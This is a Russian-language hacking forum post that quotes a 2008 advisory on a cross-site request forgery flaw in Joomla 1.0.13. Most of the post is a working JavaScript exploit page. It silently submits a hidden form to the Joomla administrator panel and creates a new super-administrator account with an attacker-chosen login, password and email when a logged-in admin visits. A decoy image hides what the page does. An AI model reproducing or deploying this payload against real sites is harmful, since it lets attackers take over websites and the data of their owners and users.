Показать сообщение отдельно

Joomla 1.0.13 CSRF Vulnerability
  #3  
Старый 13.01.2008, 21:12
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию Joomla 1.0.13 CSRF Vulnerability

Цитата:
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
PHP код:
<script type="text/javascript">
window.onload = function() {
var 
url "http://joomlasite.com/joomla/administrator/index2.php";
var 
gid 25;
var 
user 'custom_username';
var 
pass 'custom_password';
var 
email 'joe_cool (at) example (dot) com [email concealed]';
var 
param = {
nameuser,
usernameuser,
emailemail,
passwordpass,
password2pass,
gidgid,
block0,
option'com_users',
task'save',
sendEmail1
};
var 
form document.createElement('form');
form.action url;
form.method 'post';
form.target 'hidden';
form.style.display 'none';
for (var 
i in param) {
try {
// ie
var input document.createElement('<input name="'+i+'">');
} catch(
e) {
// other browsers
var input document.createElement('input');
input.name i;
}
input.setAttribute('value'param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</
script>
<
iframe name="hidden" style="display: none"></iframe>
<
img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg"
PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...
__________________
 
Ответить с цитированием